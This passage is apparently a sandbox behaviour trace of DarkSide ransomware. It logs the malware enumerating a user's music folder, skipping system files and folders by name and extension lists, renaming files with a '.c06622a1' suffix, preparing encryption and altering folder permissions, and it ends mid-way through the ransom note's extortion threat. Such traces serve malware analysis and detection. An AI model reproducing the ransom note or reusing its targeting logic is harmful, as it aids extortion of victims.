HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\FwSXzR5XrIejo.m4a" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\FwSXzR5XrIejo.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\FwSXzR5XrIejo.m4a" [0150.652] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\FwSXzR5XrIejo.m4a") returned 0x7b [0150.652] wcscpy (in: _Dest=0x45a01d6, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0150.652] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\FwSXzR5XrIejo.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\fwsxzr5xriejo.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\FwSXzR5XrIejo.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\fwsxzr5xriejo.m4a.c06622a1"), dwFlags=0x8) returned 1 [0150.655] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\FwSXzR5XrIejo.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\fwsxzr5xriejo.m4a.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x61c [0150.655] CreateIoCompletionPort (FileHandle=0x61c, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0150.655] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4700020 [0150.660] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3b8a80ba [0150.660] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xf5ad5a1 [0150.660] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6fd6742c [0150.660] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2ed57e9f [0150.660] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1c4793f2 [0150.660] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4caf9d21 [0150.660] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x798f7d07 [0150.660] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x596e5509 [0150.663] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4700094, Length=0x80) returned 0x25458df2 [0150.663] RtlComputeCrc32 (PartialCrc=0x8df2, Buffer=0x4700094, Length=0x80) returned 0xfce08d4f [0150.663] RtlComputeCrc32 (PartialCrc=0x8d4f, Buffer=0x4700094, Length=0x80) returned 0x558e22f5 [0150.663] RtlComputeCrc32 (PartialCrc=0x22f5, Buffer=0x4700094, Length=0x80) returned 0xc453c9c4 [0150.663] RtlComputeCrc32 (PartialCrc=0xc9c4, Buffer=0x4700094, Length=0x80) returned 0x13e63d9a [0150.663] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4700020) returned 1 [0150.663] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45900d8) returned 1 [0150.663] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45a00e0) returned 1 [0150.663] FindNextFileW (in: hFindFile=0x2db8840, lpFindFileData=0x3fe2ec | out: lpFindFileData=0x3fe2ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x444e9a10, ftCreationTime.dwHighDateTime=0x1d5d8e5, ftLastAccessTime.dwLowDateTime=0xbe712ec0, ftLastAccessTime.dwHighDateTime=0x1d5e24f, ftLastWriteTime.dwLowDateTime=0xbe712ec0, ftLastWriteTime.dwHighDateTime=0x1d5e24f, nFileSizeHigh=0x0, nFileSizeLow=0x24a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="KhOz.m4a", cAlternateFileName="")) returned 1 [0150.663] _wcsicmp (_Str1="KhOz.m4a", _Str2="README.c06622a1.TXT") returned -7 [0150.663] wcsstr (_Str="KhOz.m4a", _SubStr="README") returned 0x0 [0150.663] _wcsicmp (_Str1="autorun.inf", _Str2="KhOz.m4a") returned -10 [0150.663] wcslen (_String="autorun.inf") returned 0xb [0150.663] _wcsicmp (_Str1="boot.ini", _Str2="KhOz.m4a") returned -9 [0150.663] wcslen (_String="boot.ini") returned 0x8 [0150.663] _wcsicmp (_Str1="bootfont.bin", _Str2="KhOz.m4a") returned -9 [0150.664] wcslen (_String="bootfont.bin") returned 0xc [0150.664] _wcsicmp (_Str1="bootsect.bak", _Str2="KhOz.m4a") returned -9 [0150.664] wcslen (_String="bootsect.bak") returned 0xc [0150.664] _wcsicmp (_Str1="desktop.ini", _Str2="KhOz.m4a") returned -7 [0150.664] wcslen (_String="desktop.ini") returned 0xb [0150.664] _wcsicmp (_Str1="iconcache.db", _Str2="KhOz.m4a") returned -2 [0150.664] wcslen (_String="iconcache.db") returned 0xc [0150.664] _wcsicmp (_Str1="ntldr", _Str2="KhOz.m4a") returned 3 [0150.664] wcslen (_String="ntldr") returned 0x5 [0150.664] _wcsicmp (_Str1="ntuser.dat", _Str2="KhOz.m4a") returned 3 [0150.664] wcslen (_String="ntuser.dat") returned 0xa [0150.664] _wcsicmp (_Str1="ntuser.dat.log", _Str2="KhOz.m4a") returned 3 [0150.664] wcslen (_String="ntuser.dat.log") returned 0xe [0150.664] _wcsicmp (_Str1="ntuser.ini", _Str2="KhOz.m4a") returned 3 [0150.664] wcslen (_String="ntuser.ini") returned 0xa [0150.664] _wcsicmp (_Str1="thumbs.db", _Str2="KhOz.m4a") returned 9 [0150.664] wcslen (_String="thumbs.db") returned 0x9 [0150.664] _wcsicmp (_Str1="386", _Str2="m4a") returned -58 [0150.664] wcslen (_String="386") returned 0x3 [0150.664] _wcsicmp (_Str1="adv", _Str2="m4a") returned -12 [0150.664] wcslen (_String="adv") returned 0x3 [0150.664] _wcsicmp (_Str1="ani", _Str2="m4a") returned -12 [0150.664] wcslen (_String="ani") returned 0x3 [0150.664] _wcsicmp (_Str1="bat", _Str2="m4a") returned -11 [0150.664] wcslen (_String="bat") returned 0x3 [0150.664] _wcsicmp (_Str1="bin", _Str2="m4a") returned -11 [0150.664] wcslen (_String="bin") returned 0x3 [0150.664] _wcsicmp (_Str1="cab", _Str2="m4a") returned -10 [0150.664] wcslen (_String="cab") returned 0x3 [0150.664] _wcsicmp (_Str1="cmd", _Str2="m4a") returned -10 [0150.664] wcslen (_String="cmd") returned 0x3 [0150.664] _wcsicmp (_Str1="com", _Str2="m4a") returned -10 [0150.664] wcslen (_String="com") returned 0x3 [0150.664] _wcsicmp (_Str1="cpl", _Str2="m4a") returned -10 [0150.664] wcslen (_String="cpl") returned 0x3 [0150.664] _wcsicmp (_Str1="cur", _Str2="m4a") returned -10 [0150.664] wcslen (_String="cur") returned 0x3 [0150.665] _wcsicmp (_Str1="deskthemepack", _Str2="m4a") returned -9 [0150.665] wcslen (_String="deskthemepack") returned 0xd [0150.665] _wcsicmp (_Str1="diagcab", _Str2="m4a") returned -9 [0150.665] wcslen (_String="diagcab") returned 0x7 [0150.665] _wcsicmp (_Str1="diagcfg", _Str2="m4a") returned -9 [0150.665] wcslen (_String="diagcfg") returned 0x7 [0150.665] _wcsicmp (_Str1="diagpkg", _Str2="m4a") returned -9 [0150.665] wcslen (_String="diagpkg") returned 0x7 [0150.665] _wcsicmp (_Str1="dll", _Str2="m4a") returned -9 [0150.665] wcslen (_String="dll") returned 0x3 [0150.665] _wcsicmp (_Str1="drv", _Str2="m4a") returned -9 [0150.665] wcslen (_String="drv") returned 0x3 [0150.665] _wcsicmp (_Str1="exe", _Str2="m4a") returned -8 [0150.665] wcslen (_String="exe") returned 0x3 [0150.665] _wcsicmp (_Str1="hlp", _Str2="m4a") returned -5 [0150.665] wcslen (_String="hlp") returned 0x3 [0150.665] _wcsicmp (_Str1="icl", _Str2="m4a") returned -4 [0150.665] wcslen (_String="icl") returned 0x3 [0150.665] _wcsicmp (_Str1="icns", _Str2="m4a") returned -4 [0150.665] wcslen (_String="icns") returned 0x4 [0150.665] _wcsicmp (_Str1="ico", _Str2="m4a") returned -4 [0150.665] wcslen (_String="ico") returned 0x3 [0150.665] _wcsicmp (_Str1="ics", _Str2="m4a") returned -4 [0150.665] wcslen (_String="ics") returned 0x3 [0150.665] _wcsicmp (_Str1="idx", _Str2="m4a") returned -4 [0150.665] wcslen (_String="idx") returned 0x3 [0150.665] _wcsicmp (_Str1="ldf", _Str2="m4a") returned -1 [0150.665] wcslen (_String="ldf") returned 0x3 [0150.665] _wcsicmp (_Str1="lnk", _Str2="m4a") returned -1 [0150.665] wcslen (_String="lnk") returned 0x3 [0150.665] _wcsicmp (_Str1="mod", _Str2="m4a") returned 59 [0150.665] wcslen (_String="mod") returned 0x3 [0150.665] _wcsicmp (_Str1="mpa", _Str2="m4a") returned 60 [0150.665] wcslen (_String="mpa") returned 0x3 [0150.665] _wcsicmp (_Str1="msc", _Str2="m4a") returned 63 [0150.665] wcslen (_String="msc") returned 0x3 [0150.665] _wcsicmp (_Str1="msp", _Str2="m4a") returned 63 [0150.666] wcslen (_String="msp") returned 0x3 [0150.666] _wcsicmp (_Str1="msstyles", _Str2="m4a") returned 63 [0150.666] wcslen (_String="msstyles") returned 0x8 [0150.666] _wcsicmp (_Str1="msu", _Str2="m4a") returned 63 [0150.666] wcslen (_String="msu") returned 0x3 [0150.666] _wcsicmp (_Str1="nls", _Str2="m4a") returned 1 [0150.666] wcslen (_String="nls") returned 0x3 [0150.666] _wcsicmp (_Str1="nomedia", _Str2="m4a") returned 1 [0150.666] wcslen (_String="nomedia") returned 0x7 [0150.666] _wcsicmp (_Str1="ocx", _Str2="m4a") returned 2 [0150.666] wcslen (_String="ocx") returned 0x3 [0150.666] _wcsicmp (_Str1="prf", _Str2="m4a") returned 3 [0150.666] wcslen (_String="prf") returned 0x3 [0150.666] _wcsicmp (_Str1="ps1", _Str2="m4a") returned 3 [0150.666] wcslen (_String="ps1") returned 0x3 [0150.666] _wcsicmp (_Str1="rom", _Str2="m4a") returned 5 [0150.666] wcslen (_String="rom") returned 0x3 [0150.666] _wcsicmp (_Str1="rtp", _Str2="m4a") returned 5 [0150.666] wcslen (_String="rtp") returned 0x3 [0150.666] _wcsicmp (_Str1="scr", _Str2="m4a") returned 6 [0150.666] wcslen (_String="scr") returned 0x3 [0150.666] _wcsicmp (_Str1="shs", _Str2="m4a") returned 6 [0150.666] wcslen (_String="shs") returned 0x3 [0150.666] _wcsicmp (_Str1="spl", _Str2="m4a") returned 6 [0150.666] wcslen (_String="spl") returned 0x3 [0150.666] _wcsicmp (_Str1="sys", _Str2="m4a") returned 6 [0150.666] wcslen (_String="sys") returned 0x3 [0150.666] _wcsicmp (_Str1="theme", _Str2="m4a") returned 7 [0150.666] wcslen (_String="theme") returned 0x5 [0150.666] _wcsicmp (_Str1="themepack", _Str2="m4a") returned 7 [0150.666] wcslen (_String="themepack") returned 0x9 [0150.666] _wcsicmp (_Str1="wpx", _Str2="m4a") returned 10 [0150.666] wcslen (_String="wpx") returned 0x3 [0150.666] _wcsicmp (_Str1="lock", _Str2="m4a") returned -1 [0150.666] wcslen (_String="lock") returned 0x4 [0150.666] _wcsicmp (_Str1="key", _Str2="m4a") returned -2 [0150.666] wcslen (_String="key") returned 0x3 [0150.666] _wcsicmp (_Str1="hta", _Str2="m4a") returned -5 [0150.667] wcslen (_String="hta") returned 0x3 [0150.667] _wcsicmp (_Str1="msi", _Str2="m4a") returned 63 [0150.667] wcslen (_String="msi") returned 0x3 [0150.667] _wcsicmp (_Str1="pdb", _Str2="m4a") returned 3 [0150.667] wcslen (_String="pdb") returned 0x3 [0150.667] _wcsicmp (_Str1="sql", _Str2="m4a") returned 6 [0150.667] wcslen (_String="sql") returned 0x3 [0150.667] _wcsicmp (_Str1="sqlite", _Str2="m4a") returned 6 [0150.667] wcslen (_String="sqlite") returned 0x6 [0150.667] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia")) returned 0x10 [0150.667] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45900d8 [0150.667] wcscpy (in: _Dest=0x45900d8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA" [0150.667] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA") returned 0x69 [0150.667] wcscpy (in: _Dest=0x45901ac, _Source="KhOz.m4a" | out: _Dest="KhOz.m4a") returned="KhOz.m4a" [0150.667] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\KhOz.m4a", dwFileAttributes=0x80) returned 1 [0150.667] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\KhOz.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\khoz.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x618 [0150.667] SetFilePointerEx (in: hFile=0x618, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.667] ReadFile (in: hFile=0x618, lpBuffer=0x3fe174, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe204, lpOverlapped=0x0 | out: lpBuffer=0x3fe174*, lpNumberOfBytesRead=0x3fe204*=0x90, lpOverlapped=0x0) returned 1 [0150.668] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe174, Length=0x80) returned 0x4abf2d2c [0150.668] RtlComputeCrc32 (PartialCrc=0x2d2c, Buffer=0x3fe174, Length=0x80) returned 0x70f26177 [0150.668] RtlComputeCrc32 (PartialCrc=0x6177, Buffer=0x3fe174, Length=0x80) returned 0x2a181285 [0150.668] RtlComputeCrc32 (PartialCrc=0x1285, Buffer=0x3fe174, Length=0x80) returned 0x9dded4f1 [0150.668] RtlComputeCrc32 (PartialCrc=0xd4f1, Buffer=0x3fe174, Length=0x80) returned 0xe4db7c00 [0150.668] CloseHandle (hObject=0x618) returned 1 [0150.668] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45a00e0 [0150.668] wcscpy (in: _Dest=0x45a00e0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\KhOz.m4a" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\KhOz.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\KhOz.m4a" [0150.668] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\KhOz.m4a") returned 0x72 [0150.668] wcscpy (in: _Dest=0x45a01c4, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0150.668] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\KhOz.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\khoz.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\KhOz.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\khoz.m4a.c06622a1"), dwFlags=0x8) returned 1 [0150.670] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\KhOz.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\khoz.m4a.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x618 [0150.670] CreateIoCompletionPort (FileHandle=0x618, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0150.670] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4790020 [0150.676] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x63e9ce5f [0150.676] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2f798bc [0150.676] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x34fd188f [0150.676] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x60ae87f8 [0150.676] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x21a1cda6 [0150.676] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6dee5395 [0150.676] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xd219de4 [0150.676] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x73e93534 [0150.679] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4790094, Length=0x80) returned 0x624aa6af [0150.679] RtlComputeCrc32 (PartialCrc=0xa6af, Buffer=0x4790094, Length=0x80) returned 0x708529f [0150.679] RtlComputeCrc32 (PartialCrc=0x529f, Buffer=0x4790094, Length=0x80) returned 0x6bfe8a6c [0150.679] RtlComputeCrc32 (PartialCrc=0x8a6c, Buffer=0x4790094, Length=0x80) returned 0x57a78acd [0150.679] RtlComputeCrc32 (PartialCrc=0x8acd, Buffer=0x4790094, Length=0x80) returned 0xc98a70c8 [0150.679] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4790020) returned 1 [0150.679] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45900d8) returned 1 [0150.679] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45a00e0) returned 1 [0150.679] FindNextFileW (in: hFindFile=0x2db8840, lpFindFileData=0x3fe2ec | out: lpFindFileData=0x3fe2ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e20050, ftCreationTime.dwHighDateTime=0x1d5da77, ftLastAccessTime.dwLowDateTime=0xe64f2490, ftLastAccessTime.dwHighDateTime=0x1d5e71a, ftLastWriteTime.dwLowDateTime=0xe64f2490, ftLastWriteTime.dwHighDateTime=0x1d5e71a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kNf4JZn", cAlternateFileName="")) returned 1 [0150.679] _wcsicmp (_Str1="$recycle.bin", _Str2="kNf4JZn") returned -71 [0150.679] wcslen (_String="$recycle.bin") returned 0xc [0150.679] _wcsicmp (_Str1="config.msi", _Str2="kNf4JZn") returned -8 [0150.680] wcslen (_String="config.msi") returned 0xa [0150.680] _wcsicmp (_Str1="$windows.~bt", _Str2="kNf4JZn") returned -71 [0150.680] wcslen (_String="$windows.~bt") returned 0xc [0150.680] _wcsicmp (_Str1="$windows.~ws", _Str2="kNf4JZn") returned -71 [0150.680] wcslen (_String="$windows.~ws") returned 0xc [0150.680] _wcsicmp (_Str1="windows", _Str2="kNf4JZn") returned 12 [0150.680] wcslen (_String="windows") returned 0x7 [0150.680] _wcsicmp (_Str1="appdata", _Str2="kNf4JZn") returned -10 [0150.680] wcslen (_String="appdata") returned 0x7 [0150.680] _wcsicmp (_Str1="application data", _Str2="kNf4JZn") returned -10 [0150.680] wcslen (_String="application data") returned 0x10 [0150.680] _wcsicmp (_Str1="boot", _Str2="kNf4JZn") returned -9 [0150.680] wcslen (_String="boot") returned 0x4 [0150.680] _wcsicmp (_Str1="google", _Str2="kNf4JZn") returned -4 [0150.680] wcslen (_String="google") returned 0x6 [0150.680] _wcsicmp (_Str1="mozilla", _Str2="kNf4JZn") returned 2 [0150.680] wcslen (_String="mozilla") returned 0x7 [0150.680] _wcsicmp (_Str1="program files", _Str2="kNf4JZn") returned 5 [0150.680] wcslen (_String="program files") returned 0xd [0150.680] _wcsicmp (_Str1="program files (x86)", _Str2="kNf4JZn") returned 5 [0150.680] wcslen (_String="program files (x86)") returned 0x13 [0150.680] _wcsicmp (_Str1="programdata", _Str2="kNf4JZn") returned 5 [0150.680] wcslen (_String="programdata") returned 0xb [0150.680] _wcsicmp (_Str1="system volume information", _Str2="kNf4JZn") returned 8 [0150.680] wcslen (_String="system volume information") returned 0x19 [0150.680] _wcsicmp (_Str1="tor browser", _Str2="kNf4JZn") returned 9 [0150.680] wcslen (_String="tor browser") returned 0xb [0150.680] _wcsicmp (_Str1="windows.old", _Str2="kNf4JZn") returned 12 [0150.680] wcslen (_String="windows.old") returned 0xb [0150.680] _wcsicmp (_Str1="intel", _Str2="kNf4JZn") returned -2 [0150.680] wcslen (_String="intel") returned 0x5 [0150.680] _wcsicmp (_Str1="msocache", _Str2="kNf4JZn") returned 2 [0150.680] wcslen (_String="msocache") returned 0x8 [0150.680] _wcsicmp (_Str1="perflogs", _Str2="kNf4JZn") returned 5 [0150.680] wcslen (_String="perflogs") returned 0x8 [0150.680] _wcsicmp (_Str1="x64dbg", _Str2="kNf4JZn") returned 13 [0150.680] wcslen (_String="x64dbg") returned 0x6 [0150.681] _wcsicmp (_Str1="public", _Str2="kNf4JZn") returned 5 [0150.681] wcslen (_String="public") returned 0x6 [0150.681] _wcsicmp (_Str1="all users", _Str2="kNf4JZn") returned -10 [0150.681] wcslen (_String="all users") returned 0x9 [0150.681] _wcsicmp (_Str1="default", _Str2="kNf4JZn") returned -7 [0150.681] wcslen (_String="default") returned 0x7 [0150.681] wcscpy (in: _Dest=0x45700c8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\*" [0150.681] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\*") returned 0x6b [0150.681] wcscpy (in: _Dest=0x457019c, _Source="kNf4JZn" | out: _Dest="kNf4JZn") returned="kNf4JZn" [0150.681] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45900d8 [0150.681] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45a00e0 [0150.682] wcscpy (in: _Dest=0x45900d8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn" [0150.682] GetNamedSecurityInfoW () returned 0x0 [0150.682] SetEntriesInAclW () returned 0x0 [0150.682] SetNamedSecurityInfoW () returned 0x0 [0150.686] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d580f8) returned 1 [0150.686] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3fde3c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0150.686] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\knf4jzn")) returned 1 [0150.686] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the 